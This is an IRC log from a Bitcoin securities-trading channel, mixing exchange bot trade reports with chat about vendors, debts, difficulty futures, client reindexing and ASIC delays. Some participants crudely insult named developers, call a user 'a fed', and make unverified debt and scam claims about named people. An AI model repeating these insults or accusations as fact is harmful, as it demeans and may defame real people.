BTC [-] Feb 20 17:23:21 Hola Feb 20 17:24:04 ;;asks 30 Feb 20 17:24:06 There are currently 13565.923 bitcoins offered at or under 30.0 USD, worth 405688.531668 USD in total. Feb 20 17:32:26 [MPEX] [S.MPOE] 6400 @ 0.00064285 = 4.1142 BTC [+] Feb 20 17:33:25 silver is now dollar under btc Feb 20 17:33:35 hows that going usagi Feb 20 17:34:23 silver is still worth more by his valuation Feb 20 17:34:27 dont go by price Feb 20 17:38:03 [BTCTC] [BTC-TRADING-PT] 1 @ 0.0908 BTC [-] Feb 20 17:38:25 truffles is a fed Feb 20 17:38:57 narc? Feb 20 17:42:51 [MPEX] [S.MPOE] 2627 @ 0.00065063 = 1.7092 BTC [+] Feb 20 17:42:53 [MPEX] [S.MPOE] 3173 @ 0.00065069 = 2.0646 BTC [+] Feb 20 17:45:41 Arent they poor? Feb 20 17:45:41 they are Feb 20 17:45:42 anyone used coinabul? Feb 20 17:47:12 deadweasel: yea i have Feb 20 17:47:16 they are VERY slow Feb 20 17:47:29 usually takes 2-3 weeks before they even ship Feb 20 17:48:07 adn we've had a package sitting in customs now for a month because coinabul didnt put a proper description or invoice Feb 20 17:49:48 [MPEX] [S.DICE] 75 @ 0.00610001 = 0.4575 BTC [-] Feb 20 17:50:39 shit. Feb 20 17:50:45 sounds crappy as hell. Feb 20 17:50:55 should ready the forums before buying, stupid me. Feb 20 17:51:03 should have read* Feb 20 17:57:25 talk to coingenuity here on irc about coinabul and he should be able to help you. Feb 20 17:57:47 Note to self... no to coinabul Feb 20 18:00:43 [MPEX] [S.MPOE] 1148 @ 0.00065069 = 0.747 BTC [+] Feb 20 18:00:45 [MPEX] [S.MPOE] 11752 @ 0.0006507 = 7.647 BTC [+] Feb 20 18:02:37 care to explain? Feb 20 18:03:00 [MPEX] [S.DICE] 1000 @ 0.00636802 = 6.368 BTC [+] Feb 20 18:03:02 [MPEX] [S.DICE] 300 @ 0.00636803 = 1.9104 BTC [+] Feb 20 18:03:03 [MPEX] [S.DICE] 8700 @ 0.00639 = 55.593 BTC [+] Feb 20 18:03:31 no dont use analogies, just say how Feb 20 18:03:39 hey mircea_popescu: if someone PUSH's shares to my account, would i receive any sort of notification? in STATS? or STATSJSON? Feb 20 18:03:49 ok pirate Feb 20 18:04:15 [MPEX] [S.MPOE] 4321 @ 0.00065066 = 2.8115 BTC [-] Feb 20 18:04:17 [MPEX] [S.MPOE] 8398 @ 0.0006507 = 5.4646 BTC [+] Feb 20 18:04:29 [BTCTC] [BTC-BOND] 1 @ 0.00999 BTC [-] Feb 20 18:04:31 [MPEX] [S.MPOE] 4764 @ 0.00065568 = 3.1237 BTC [+] Feb 20 18:04:32 but this is a secret business model that if you explain to us, then it won't work anymore? Feb 20 18:05:16 no Feb 20 18:05:18 cpa still owes me like 200btc or so, take it from there Feb 20 18:06:43 usagi: please don't come around here telling us you have a super secret method to make money selling something going up and buying something going down but that your too smart too waste your time actually backing it up unless you get paid Feb 20 18:07:44 usagi: how is that different from how a scammer would behave? Feb 20 18:08:27 [HAVELOCK] [SDICE] 7 @ 0.680001 = 4.76 BTC [+] Feb 20 18:08:29 [HAVELOCK] [SDICE] 50 @ 0.68 = 34 BTC [-] Feb 20 18:08:30 [HAVELOCK] [SDICE] 7 @ 0.67 = 4.69 BTC [-] Feb 20 18:08:31 [HAVELOCK] [SDICE] 9 @ 0.661 = 5.949 BTC [-] Feb 20 18:08:32 [HAVELOCK] [SDICE] 27 @ 0.66 = 17.82 BTC [-] Feb 20 18:10:27 He is a teacher Pigeons.... just looking to cash in on his textbook. Feb 20 18:10:52 Little Red Book... how to make Bitcoin sing for you. Feb 20 18:10:58 [MPEX] [S.MPOE] 4321 @ 0.00064726 = 2.7968 BTC [-] Feb 20 18:11:00 [MPEX] [S.MPOE] 14300 @ 0.00064711 = 9.2537 BTC [-] Feb 20 18:11:02 [MPEX] [S.MPOE] 6959 @ 0.00064212 = 4.4685 BTC [-] Feb 20 18:11:04 [MPEX] [S.MPOE] 486 @ 0.00064122 = 0.3116 BTC [-] Feb 20 18:12:42 which book? Feb 20 18:13:00 [MPEX] [S.MPOE] 4321 @ 0.00064064 = 2.7682 BTC [-] Feb 20 18:13:02 [MPEX] [S.MPOE] 3929 @ 0.00064096 = 2.5183 BTC [+] Feb 20 18:13:15 really, you're smart enough to execute this strategy successfully, but not smart enough to articulate an irc summary? Feb 20 18:13:21 The one he hasnt written Feb 20 18:13:35 i dont watch videos Feb 20 18:13:50 i'm not a fucking investigator Feb 20 18:13:54 It is the SECRET... Feb 20 18:13:56 omg Feb 20 18:14:10 i apologize for my rudeness Feb 20 18:14:15 Just hope and it happens Feb 20 18:14:39 can you please give us a loose general summary? Feb 20 18:15:09 Man... oh man Feb 20 18:16:00 Oh boy Glenn Beck Feb 20 18:16:03 topace, there is no notification for incoming PUSH. just the balance changes. Feb 20 18:16:42 jurov: hmm thats going to make it very difficult to automate anything with Feb 20 18:16:58 [MPEX] [S.MPOE] 4400 @ 0.00063602 = 2.7985 BTC [-] Feb 20 18:17:00 [MPEX] [S.MPOE] 4321 @ 0.00063551 = 2.746 BTC [-] Feb 20 18:17:01 [MPEX] [S.MPOE] 3829 @ 0.00063551 = 2.4334 BTC [-] Feb 20 18:18:18 topace, you can ask user the receipt and ttry to validate it Feb 20 18:18:27 Fools Gold: Inside the Glenn Beck Goldline Scheme http://www.ritholtz.com/blog/wp-content/uploads/2010/07/GoldlineGlennBeck4.jpg Feb 20 18:19:19 usagi: whats your current pricing on silver? im looking to pickup a few more ounces Feb 20 18:21:22 who would pay that? Feb 20 18:23:31 THere is a pitch Feb 20 18:24:02 spam detected Feb 20 18:24:08 40% Feb 20 18:24:11 Dude. They sell 1oz coins fro 1.27 Feb 20 18:24:23 why would you buy the 1/2oz Feb 20 18:24:44 1.1 Feb 20 18:24:51 why would anyone buy those though? Feb 20 18:25:23 so you beat their least interesting product Feb 20 18:25:30 But this... http://coinabul.com/silver/index.php/silver-sorted-by-weight/liberty-eagle-silver-dollar-coins.html Feb 20 18:25:33 they wouldn't. they don't. they can get them cheaper Feb 20 18:26:03 ฿1.2377 Liberty Eagle - 1 Troy ounce Feb 20 18:27:28 usagi, you argued with me when you came in here saying i was ridiculous for not believing "IT IS LITERALLY IMPOSSIBLE FOR CPA TO GO BANKRUPT" Feb 20 18:27:45 spam detected Feb 20 18:28:11 so you owe kakobrekla 200+ btc for cpa? Feb 20 18:30:34 just checked, its exactly 200. Feb 20 18:30:55 aka never. Feb 20 18:31:21 how does imsaguy have it? Feb 20 18:31:37 hint: imsa doesnt have it. Feb 20 18:31:59 why does imsaguy owe it to you? Feb 20 18:32:26 ;;ticker Feb 20 18:32:27 BTCUSD ticker | Best bid: 29.62211, Best ask: 29.64999, Bid-ask spread: 0.02788, Last trade: 29.64999, 24 hour volume: 49946.12298648, 24 hour low: 28.61200, 24 hour high: 29.65000, 24 hour vwap: 29.26420 Feb 20 18:32:39 how much does imsaguy owe you now? Feb 20 18:33:01 can you find out for me, i want to talk to him about it Feb 20 18:34:59 still odd an insurance company invests in old mcdonald the ppt operator Feb 20 18:35:58 eieio Feb 20 18:36:48 Brrrrr Feb 20 18:37:58 soo whats up ? Feb 20 18:38:06 bitcoins Feb 20 18:38:18 lol srsly ? Feb 20 18:38:26 o hey 29 cool Feb 20 18:38:54 usagi: remember the message where you said it wasn't a rush to get paid back? Feb 20 18:38:58 topace you wouldn't receive a notification. you'd see the extra shares in your balance Feb 20 18:38:59 thats the last you said to me Feb 20 18:39:05 whoever pushes them has a signed receipt they can show you. Feb 20 18:39:07 but then in public you state something differently. Feb 20 18:39:36 We're getting there. Feb 20 18:40:01 I realize its been expensive for you, it likewise has been for me. Feb 20 18:41:10 how many bitvps shares did you say brendio has? Feb 20 18:41:21 i get t his feeling i'm missing out on like half the btc drama Feb 20 18:41:31 mircea_popescu: more than half Feb 20 18:41:40 there's no 'keeping up' with all of the drama Feb 20 18:41:44 i will die poor. Feb 20 18:42:02 ultimately, doesn't everyone? Feb 20 18:42:07 mircea_popescu: what does that receipt look like? also, do you have any sort of API, besides just scripting with the pympex script? Feb 20 18:42:18 has brendio defaulted? Feb 20 18:42:42 [MPEX] [S.MPOE] 492 @ 0.00063551 = 0.3127 BTC [-] Feb 20 18:42:43 [MPEX] [S.MPOE] 5008 @ 0.00063551 = 3.1826 BTC [-] Feb 20 18:42:43 topace something like "Your request to push x of y to z has been received and will be processed." signed by mpex. and no. Feb 20 18:42:54 i don't know what an api would do other than that tho ? Feb 20 18:43:04 mircea_popescu: yea, i guess :) Feb 20 18:43:12 mircea_popescu: k thanks... ill see what i can do :) Feb 20 18:43:29 it's seriously better than any api, just get py/perl going Feb 20 18:43:50 and i seriously can't believe nobody's written a bitbet bot yet. Feb 20 18:44:30 bitbet bot ? just to trade BBET shares? Feb 20 18:45:07 nono, to fake line betting for the people too lazy to think Feb 20 18:45:18 it's trivial to extract a profit from offering lines on top of bitbet. Feb 20 18:45:40 lines? Feb 20 18:45:49 sometimes i have no clue what you're talking about :p Feb 20 18:46:17 you know what line betting is ? Feb 20 18:46:47 nope Feb 20 18:46:51 guess im not a gambler :p Feb 20 18:47:04 What about the other half of the drama mircea_popescu .... Feb 20 18:47:05 were their 8 mpex S.BVPS holders at time of delisting? and brendio is 1? Feb 20 18:47:06 hehe then it wouldn't make any sense would it. Feb 20 18:47:20 Bicknellski_ which one other half ? there's like 3. Feb 20 18:47:32 also in the news : Feb 20 18:47:35 "The French workforce gets paid high wages but works only three hours. They get one hour for breaks and lunch, talk for three and work for three," Taylor wrote on February 8 in the letter in English to the minister, Arnaud Montebourg. Feb 20 18:47:41 "Titan is going to buy a Chinese tire company or an Indian one, pay less than one Euro per hour wage and ship all the tires France needs," he said. "You can keep the so-called workers." Feb 20 18:47:46 this guy is like, my new hero. Feb 20 18:48:26 https://sphotos-a.xx.fbcdn.net/hphotos-ash4/267903_522618091124242_637100570_n.jpg Feb 20 18:49:04 At some point all manufacturing will have to be "local" Feb 20 18:49:23 not too likely. Feb 20 18:50:01 there's always going to be communes of idiots who will firmly believe they can circlejerk reality into changing. Feb 20 18:50:15 those will have to be routed around by manufacturing/mattering/sanity in general. Feb 20 18:50:44 [MPEX] [S.MPOE] 4321 @ 0.0006357 = 2.7469 BTC [+] Feb 20 18:50:45 [MPEX] [S.MPOE] 10992 @ 0.00063551 = 6.9855 BTC [-] Feb 20 18:50:51 [MPEX] [S.MPOE] 12965 @ 0.0006355 = 8.2393 BTC [-] Feb 20 18:51:00 Communes? Feb 20 18:51:30 yes. Feb 20 18:51:45 There are idiots at all levels in all walks in all ivory towers Feb 20 18:51:52 group without hierarchy = commune. any bunch of people that make "we're all equal" a group norm. Feb 20 18:52:15 Like open source Feb 20 18:52:20 ya they are idiots Feb 20 18:52:25 or more practically speaking, any group in which a majority lacks a concrete and definite understanding of their inferiority. Feb 20 18:52:37 Bicknellski_ open source ain't manufacturing now is it. Feb 20 18:52:50 you were talking comunes Feb 20 18:52:57 they are commune Feb 20 18:52:59 no? Feb 20 18:53:02 open source doesn't meet the commune definitions above either. Feb 20 18:53:12 it is not a commune Feb 20 18:53:27 so then what are we talkin about! Feb 20 18:53:43 https://bitcointalk.org/index.php?topic=144927.0 lmao Feb 20 18:53:46 groups without hierarch Feb 20 18:53:59 ... we are all equal Feb 20 18:54:03 ... commune Feb 20 18:54:31 imsaguy no way, that's legit ? Feb 20 18:54:37 Bicknellski_ who's equal ? Feb 20 18:54:51 Are they? Feb 20 18:55:03 Like open sources Feb 20 18:55:15 they can be tarred with the same brush no? Feb 20 18:55:29 idiots. Feb 20 18:55:31 ... Feb 20 18:55:36 i fail to see your reasoning here. Feb 20 18:55:49 I think I fail to see yours Feb 20 18:56:02 so who's equal to who ? Feb 20 18:56:04 how are people idiots if they subscribe to communal think Feb 20 18:56:07 thinking Feb 20 18:56:21 by definition. that's what it takes to be an idiot : not think. Feb 20 18:56:35 there's always going to be communes of idiots who will firmly believe they can circlejerk reality into changing. Feb 20 18:56:44 right. Feb 20 18:56:58 so people in the open source communit are idiots Feb 20 18:56:59 got it Feb 20 18:57:05 how do you figure ? Feb 20 18:57:26 how are they different than other communes Feb 20 18:57:32 this is like "water won't go uphill" "ok so icecream vendors are pervets". doth not follow. Feb 20 18:57:45 no it isnt Feb 20 18:58:03 there's always going to be communes of idiots who will firmly believe they can circlejerk reality into changing. Feb 20 18:58:09 there's no similarity. open source is a venture centered around a project. that project actually exist. Feb 20 18:58:17 No one in the open source commune thinks that way? Feb 20 18:58:17 [MPEX] [S.MPOE] 728 @ 0.00063488 = 0.4622 BTC [-] Feb 20 18:58:18 people belong or don't belong by how they contribute to the actual project Feb 20 18:58:19 really Feb 20 18:58:29 people who just dick around and suck cock (gmaxwell, taaki, who have you) aren't even part of it. Feb 20 18:58:39 now, the people actually involved may be too polite to point it out explicitly Feb 20 18:58:48 but then again it doesn't really need to be made explicit. Feb 20 18:58:56 so there is no commune in open source Feb 20 18:59:01 elites and posers Feb 20 18:59:11 not in the sense defined, no, which is what i said. Feb 20 18:59:21 those who contribute and those who pose Feb 20 18:59:30 open source is exactly well implemented elitism : we are better than you, and here's why. Feb 20 19:00:17 1337 Feb 20 19:00:23 also hax. Feb 20 19:00:32 after it has touched 100 posers hands... to the 1 hand of the elite to make it work? Feb 20 19:00:48 "Although it shouldn't be a surprise, given the company is run by wankers, Coinbase is a leading player in the Bitcoin world that discourages anonymity, unlike similar online wallet services." Feb 20 19:00:55 the forum never fails. Feb 20 19:00:56 where does one determine the merit of what is added on? Feb 20 19:01:11 Bicknellski_ well, it has to make it in the main repo, for one. Feb 20 19:01:19 look at linus' maintenance record. Feb 20 19:01:35 it also has to be used once it has. look at canonical's unite failure. Feb 20 19:01:51 well above my pay grade Feb 20 19:01:57 but I can follow go on Feb 20 19:02:16 that's kinda it. Feb 20 19:02:26 Well then I cant follow Feb 20 19:02:30 which part ? Feb 20 19:02:43 this "i can't follow" is like "error message : there was an error". Feb 20 19:03:07 The terms that were meant to prove your point Feb 20 19:03:14 never heard of that before Feb 20 19:03:19 simplify Feb 20 19:03:28 s/unite/unity/ Feb 20 19:03:32 ... anyhow it proves your point Feb 20 19:03:32 well mebbe one day if i get aroudn to it/figure out how to. Feb 20 19:03:35 B0g4r7 o that's right. Feb 20 19:03:47 unite was opera's failure i think Feb 20 19:03:50 [MPEX] [S.MPOE] 3922 @ 0.00063496 = 2.4903 BTC [+] Feb 20 19:03:52 or something. Feb 20 19:03:55 [MPEX] [S.MPOE] 228 @ 0.00063425 = 0.1446 BTC [-] Feb 20 19:03:56 so - , openoffice, in a spreadsheet I want to import in a nice named area a csv file. Feb 20 19:03:56 Insert | Link to External Data -> select file, select "," and deselect tabs as separators. Feb 20 19:03:56 and.... nothing. No area to select. Just what planet are the devs on to let this idiotic stupidity through? Feb 20 19:04:32 markedathome incidentally, didn't open office project implode a few years back ? Feb 20 19:04:40 #openoffice Feb 20 19:04:44 and it's like libre now or something ? Feb 20 19:04:49 yeah libreoffice is maintained Feb 20 19:04:51 I've had better results with libreoffice. Feb 20 19:04:58 "Cosmetic Surgery Crowdfunding @ theperfectboobs.net" Feb 20 19:05:01 dude! SRSLY! Feb 20 19:05:09 with the disaster this "simple" process has, I am not surprised... Feb 20 19:05:10 crowdsourced tits. they're for the internets anyway. Feb 20 19:05:18 The perfect boobs are natural ones. Feb 20 19:05:26 not dotnet. Feb 20 19:05:31 dotnet's always been a fake. Feb 20 19:06:08 woohoo only 287 days to go for reindexing... (0.8) Feb 20 19:06:29 I did that yesterday. Took forever. Feb 20 19:06:35 It gets slower as it goes on. Feb 20 19:06:44 [MPEX] [S.MPOE] 12000 @ 0.00063425 = 7.611 BTC [-] Feb 20 19:06:45 Give it all the cpu and IO you can spare. Feb 20 19:06:54 at the risk of appearing about as clueless as i am, what is a reindexing ? Feb 20 19:07:11 It's what happened to me when I upgraded to 0.8.0 of the satoshi client. Feb 20 19:07:22 Spent hours "reindexing blocks". Feb 20 19:07:35 0.8 is out? Feb 20 19:07:43 aye Feb 20 19:07:45 im getting old. Feb 20 19:07:47 Yesterday Feb 20 19:07:57 transitioning from the old berkelydb (with 7GB of data) to google's shiny LevelDB format, unknown as to the db size at least from my end. Feb 20 19:08:08 why would you ? Feb 20 19:08:14 critical vuln in old version or something ? Feb 20 19:08:31 Well, I just did it as a favor to the devs, to help test it. Feb 20 19:08:41 yeah, it takes 3 days to import 1 days worth of transactions... :-) Feb 20 19:08:41 no they are still flat files of block data, just written in several smaller files in directories now Feb 20 19:09:04 6 days if you have a hard disk and not an ssd Feb 20 19:09:07 i too thought it was berkelydb but that's just the wallet and ip dbs Feb 20 19:09:24 It took several hours on a SB i7 with an SSD. Feb 20 19:09:30 and yes it takes days to read in the large file and write out all the small ones Feb 20 19:09:33 And quite a bit longer on a q6600 with ssd. Feb 20 19:09:36 then what format was the blkindex? Feb 20 19:09:43 wouldn't it be easier to just re-dld the chain ? Feb 20 19:09:56 !ticker h G.BBET Feb 20 19:10:00 Things which are alike, in nature, grow to look alike, and the speaking stones have lain a long time lookin' at the sun. Feb 20 19:10:06 !ticker btct G.BBET Feb 20 19:10:09 Some are born to endless night. Feb 20 19:10:12 yeah blkindex.dat berkely Feb 20 19:10:16 ok i give up. which is this one Feb 20 19:11:10 !ticker btct.co g.bbet Feb 20 19:11:10 Good morning, may you serve the Lord, and may His holy dominion guide you through your dismal life. Feb 20 19:11:17 !ticker btct GGBET Feb 20 19:11:18 It says some pelt-wearin' trapper, some stinkin' bean-suckin' possum skinner, he's gonna collect that reward money. Feb 20 19:11:25 mircea_popescu: there is a bitbet bot... Feb 20 19:11:36 thestringpuller a there is ? Feb 20 19:11:41 there is a mini-whale on bitbet Feb 20 19:11:51 mircea_popescu: when it re-dl's the chain it has to verify each transaction Feb 20 19:12:02 well ya there's been some massive bets but i was thinking more of offering it as a service. Feb 20 19:12:17 pigeons it can't POSSIBLY take more than a week can it ?! Feb 20 19:12:27 no it doesnt take a week Feb 20 19:12:31 feels like point of no return. i'm dealer now :D Feb 20 19:12:42 You were seller? Feb 20 19:12:42 need handsanitizer jurov Feb 20 19:12:43 well, it is all go this week - linux 3.8, firefox 19, bitcoin client 0.8, playstation 4... . Feb 20 19:12:51 jurov: what did you sell Feb 20 19:12:57 sperm Feb 20 19:13:06 mircea_popescu well the mini-whale is a bookie, wait till baseball season Feb 20 19:13:08 sold few bitcoins for euros Feb 20 19:13:14 Nice. Feb 20 19:13:24 so I suspect he's run through a bot Feb 20 19:13:29 thestringpuller that's ap oin ya Feb 20 19:15:20 ap oin ya? Feb 20 19:15:43 [MPEX] [S.MPOE] 4321 @ 0.00063656 = 2.7506 BTC [+] Feb 20 19:15:44 [MPEX] [S.MPOE] 9734 @ 0.00063683 = 6.1989 BTC [+] Feb 20 19:15:46 [MPEX] [S.MPOE] 4011 @ 0.00063782 = 2.5583 BTC [+] Feb 20 19:15:52 friday... Feb 20 19:16:01 friday you will see what the actual % mpoe bot made Feb 20 19:16:39 did you not read da faq? :P Feb 20 19:16:45 no refunds! Feb 20 19:17:08 a point yeah Feb 20 19:17:13 "last friday of the month" Feb 20 19:17:35 !ticker X.IDIFF.MAR Feb 20 19:17:36 Have you got any tobacco? Feb 20 19:17:41 !ticker m X.IDIFF.MAR Feb 20 19:17:43 [MPEX:X.IDIFF.MAR] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.07595 / 0.07595 / 0.07595 (8 shares, 0.61 BTC), 30D: 0.0429 / 0.06540414 / 0.089 (338 shares, 22.11 BTC) Feb 20 19:17:50 coincendental heh Feb 20 19:17:58 usagi, yes today midnight. if ukto will be around Feb 20 19:18:10 jurov: is this for january? Feb 20 19:18:14 or february Feb 20 19:18:17 oh no mement Feb 20 19:18:28 mement? Feb 20 19:18:38 derp, moment Feb 20 19:18:44 ;;bc,stats Feb 20 19:18:49 Current Blocks: 222206 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1569 blocks | Next Difficulty In About: 1 week, 2 days, 2 hours, 55 minutes, and 48 seconds | Next Difficulty Estimate: 4221147.10761 | Estimated Percent Change: 15.61582 Feb 20 19:18:57 today midnight matures only CoinBr.iDiff-E , the difficulty future Feb 20 19:19:16 i'm gonna pay 0.03651011 per share Feb 20 19:19:27 futures mature on thursday? Feb 20 19:19:37 thursdays* Feb 20 19:19:46 thestringpuller well, mpex runs imm dates. jurov took the concept of imm dates and made them monthly Feb 20 19:19:48 CoinBr.MPBPT-E, the MPOE Bond passthrough, matures friday midnight Feb 20 19:19:51 which is a little innovative, but hey. Feb 20 19:20:38 thestringpuller, futures mature wednesday midnight. both coinbr and mpex ones. Feb 20 19:20:59 i see that now Feb 20 19:21:12 [MPEX] [S.MPOE] 4321 @ 0.00063434 = 2.741 BTC [-] Feb 20 19:21:17 [MPEX] [S.MPOE] 5579 @ 0.00063425 = 3.5385 BTC [-] Feb 20 19:21:41 how are you funding coinbr futures contracts? Feb 20 19:21:51 bonds like mircea? Feb 20 19:22:49 either i sell covered by my own funds, or i just accept collateral from whoever wants to short Feb 20 19:23:01 i'm not paying interest on that collateral Feb 20 19:24:22 if you bought them at 0.045 (expecting difficulty to be 4.5m) then yes,it's a loss Feb 20 19:24:32 diff contracts are a bit for the diff going up Feb 20 19:24:35 bet* Feb 20 19:24:42 ;;bc,diff Feb 20 19:24:42 3651011.6306932 Feb 20 19:24:51 .1 is too expensive for an idiff Feb 20 19:25:03 i did never sell under 0.039 so i ended up with profit this time Feb 20 19:25:24 you are selling/buying your own contracts? Feb 20 19:25:25 lol Feb 20 19:25:30 jurov is his own futures bot Feb 20 19:26:42 Okay. Now for mpoe bonds passthrough, I can be profitable even when selling them bit under nominal value. I won't reveal how, but it's quite hidden in plain sight. Feb 20 19:27:22 how do you price them? Feb 20 19:27:51 the first ones sell at 0.1003 , then up to 0.101 Feb 20 19:28:05 lol hidden in plain sight :P Feb 20 19:28:44 ;;bc,stats Feb 20 19:28:47 Current Blocks: 222208 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1567 blocks | Next Difficulty In About: 1 week, 2 days, 2 hours, 39 minutes, and 4 seconds | Next Difficulty Estimate: 4229167.93495 | Estimated Percent Change: 15.83551 Feb 20 19:29:03 lol asics are a myth Feb 20 19:29:07 ;;bc,tslb Feb 20 19:29:08 Time since last block: 5 minutes and 5 seconds Feb 20 19:29:13 :D Feb 20 19:29:40 http://gfyi95.com/bASIC/bASIC%20Forum/www.btcfpga.com/forum/index.html Feb 20 19:29:45 that's pretty cool, whodunnit ? Feb 20 19:29:53 .1 is too expensive for an idiff << why? Feb 20 19:30:29 The difficulty is expected to stay below 10 million atm Feb 20 19:30:35 but soon .1 may be good Feb 20 19:30:39 for like a september Feb 20 19:31:32 but for mar .1 is too much Feb 20 19:31:37 it's possibly the most volatile thing in existence atm. Feb 20 19:31:39 heck, i offer collateral 0.15 for CoinBr.iDiff-O Feb 20 19:31:42 diff can go up 1000x Feb 20 19:31:53 over a six week period or w/e Feb 20 19:31:55 the march one Feb 20 19:31:57 it CAN but with asics it's more likely to go up Feb 20 19:32:24 and my offering at 0.7 just sold out today Feb 20 19:32:33 so that's public opinion Feb 20 19:32:49 * 0.07 sry Feb 20 19:33:29 i grabbed some of those Feb 20 19:34:33 .07 for O or E? Feb 20 19:34:41 O Feb 20 19:34:50 O( march 20) Feb 20 19:35:09 ;;seen smickles Feb 20 19:35:09 smickles was last seen in #bitcoin-assets 1 week, 4 days, 15 hours, 24 minutes, and 28 seconds ago: pong Feb 20 19:35:42 can someone send him en email already Feb 20 19:36:51 but away Feb 20 19:36:55 very away Feb 20 19:37:15 maternity away most likely Feb 20 19:37:17 [MPEX] [S.MPOE] 20793 @ 0.00063425 = 13.188 BTC [-] Feb 20 19:37:18 [MPEX] [S.MPOE] 2607 @ 0.00063407 = 1.653 BTC [-] Feb 20 19:38:54 s.mpoe is at a low today lol Feb 20 19:39:01 ;;asks 30 Feb 20 19:39:03 There are currently 10677.262 bitcoins offered at or under 30.0 USD, worth 319913.719394 USD in total. Feb 20 19:39:20 erryone cashing out Feb 20 19:39:28 ;;bids 25 Feb 20 19:39:30 There are currently 49226.405 bitcoins demanded at or over 25.0 USD, worth 1341765.94829 USD in total. Feb 20 19:39:50 [MPEX] [S.MPOE] 3185 @ 0.00063407 = 2.0195 BTC [-] Feb 20 19:41:54 kakobrekla: I just sent one. Feb 20 19:42:23 took long enough Feb 20 19:43:59 omg bfl is shipping Feb 20 19:44:02 [MPEX] [S.MPOE] 8146 @ 0.00063407 = 5.1651 BTC [-] Feb 20 19:45:13 omg bfl is shipping "Words You Thought He'd Never Say" Feb 20 19:45:30 i'm good at that. Feb 20 19:45:44 url? Feb 20 19:46:00 http://totally-legit.com Feb 20 19:46:16 ah i was already on http://pirate-paid.org Feb 20 19:46:31 it's pirate-paid.lol Feb 20 19:46:45 how come there's not a lol tld already ? Feb 20 19:46:48 .lol costs like a million bucks or so Feb 20 19:46:52 all the cats could be expelled there Feb 20 19:46:59 kakobrekla no it costs 1mn internets Feb 20 19:47:03 fudr.us isn't enough? Feb 20 19:47:07 which is like... .06 btc or some shit Feb 20 19:47:12 lol Feb 20 19:48:02 ok, well, i'm off to exile. Feb 20 19:48:06 if anyone missed the psa yest, Feb 20 19:48:11 i forgot Feb 20 19:48:13 http://trilema.com/2013/path-of-exile/ Feb 20 19:48:14 but its 1 or 10 mio Feb 20 19:48:16 for real Feb 20 19:48:18 totally gotta play that game. Feb 20 19:48:19 to get a tld Feb 20 19:48:25 mircea_popescu see pm Feb 20 19:51:43 mircea_popescu: you have a windows machine? Feb 20 19:51:59 i saw that game but its an .msi Feb 20 19:54:07 pigeons, read the comments. he's running it on wine Feb 20 19:54:52 how do i launch the msiexec installer on wine? Feb 20 19:55:04 [MPEX] [S.MPOE] 2512 @ 0.00063407 = 1.5928 BTC [-] Feb 20 19:55:09 [MPEX] [S.MPOE] 7138 @ 0.00063391 = 4.5248 BTC [-] Feb 20 19:55:10 wine installer.msi doesn't work? Feb 20 19:55:32 no, but wine misexec installer.msi works, cool Feb 20 19:55:39 *msiexec Feb 20 19:56:35 wine msiexec /i PathOfExileInstaller.msi Feb 20 19:57:44 with just wine i get wine: Bad EXE format for PathOfExileInstaller.msi Feb 20 19:58:09 i was wanting to try it too Feb 20 20:05:05 lol, anyone cares to mention mpex there? http://vincesamios.com/bitcoins/valuations-of-stocks-in-bitcoin-brain-melt Feb 20 20:05:50 ;;ticker Feb 20 20:05:51 BTCUSD ticker | Best bid: 29.83010, Best ask: 29.84500, Bid-ask spread: 0.01490, Last trade: 29.83010, 24 hour volume: 49106.10612446, 24 hour low: 28.61200, 24 hour high: 29.86900, 24 hour vwap: 29.35041 Feb 20 20:07:54 [MPEX] [S.MPOE] 19668 @ 0.00063464 = 12.4821 BTC [+] Feb 20 20:07:56 [MPEX] [S.MPOE] 1632 @ 0.00063782 = 1.0409 BTC [+] Feb 20 20:11:28 [MPEX] [S.MPOE] 3057 @ 0.00063782 = 1.9498 BTC [+] Feb 20 20:11:30 [MPEX] [S.MPOE] 4321 @ 0.00063937 = 2.7627 BTC [+] Feb 20 20:11:32 [MPEX] [S.MPOE] 14622 @ 0.00063938 = 9.349 BTC [+] Feb 20 20:13:29 [MPEX] [S.MPOE] 4321 @ 0.00063396 = 2.7393 BTC [-] Feb 20 20:13:31 [MPEX] [S.MPOE] 9962 @ 0.00063391 = 6.315 BTC [-] Feb 20 20:13:32 [MPEX] [S.MPOE] 517 @ 0.00063353 = 0.3275 BTC [-] Feb 20 20:17:45 [MPEX] [S.MPOE] 2583 @ 0.00063353 = 1.6364 BTC [-] Feb 20 20:17:46 [MPEX] [S.MPOE] 28917 @ 0.00063346 = 18.3178 BTC [-] Feb 20 20:18:21 ;;bc,24hprc Feb 20 20:18:22 29.35 Feb 20 20:20:13 [MPEX] [S.MPOE] 9150 @ 0.00063346 = 5.7962 BTC [-] Feb 20 20:25:21 Bugpowder: hey you there? Feb 20 20:26:24 yea Feb 20 20:27:17 [MPEX] [S.MPOE] 10433 @ 0.00063346 = 6.6089 BTC [-] Feb 20 20:27:19 [MPEX] [S.MPOE] 13967 @ 0.0006334 = 8.8467 BTC [-] Feb 20 20:28:01 ah excellent... pm? Feb 20 20:29:13 looks like avalon got delayed Feb 20 20:29:32 ho ho ho Feb 20 20:29:51 I am STUNNED Feb 20 20:29:53 "If you order now this batch is scheduled to start shipping by March 10th and before April 15th." Feb 20 20:30:00 For batch 2 Feb 20 20:30:07 nobody is gonna buy my XDIFFS :( Feb 20 20:30:13 They caught a small dose of BFL syndrome Feb 20 20:30:18 Source? Feb 20 20:30:26 http://store.avalon-asics.com/?product=avalon-asic-batch-2 Feb 20 20:31:10 [MPEX] [S.MPOE] 4321 @ 0.00063937 = 2.7627 BTC [+] Feb 20 20:31:11 Hm, a small delay/ Feb 20 20:31:11 [MPEX] [S.MPOE] 16179 @ 0.00063938 = 10.3445 BTC [+] Feb 20 20:31:18 Used to be Mar 5 to April 5. Feb 20 20:31:36 Still is on launch. Feb 20 20:33:22 Another ASIC spotted Feb 20 20:33:23 http://hhtt.1209k.com/user-details.php?user=1MngEke9hbW2RYGnw27r5QgS1TXLC68TV6 Feb 20 20:33:29 Probably an Avalon Feb 20 20:35:26 sure its not asicminer? Feb 20 20:35:31 they're mining on at least 2 pools Feb 20 20:36:58 well, its 66 GHZ Feb 20 20:37:05 gigahash Feb 20 20:42:46 [MPEX] [S.MPOE] 3800 @ 0.00063845 = 2.4261 BTC [-] Feb 20 20:43:29 Bowjob: ghash not ghz Feb 20 20:44:31 A guy came on eligius the other day with 6 fpga mini-rigs. 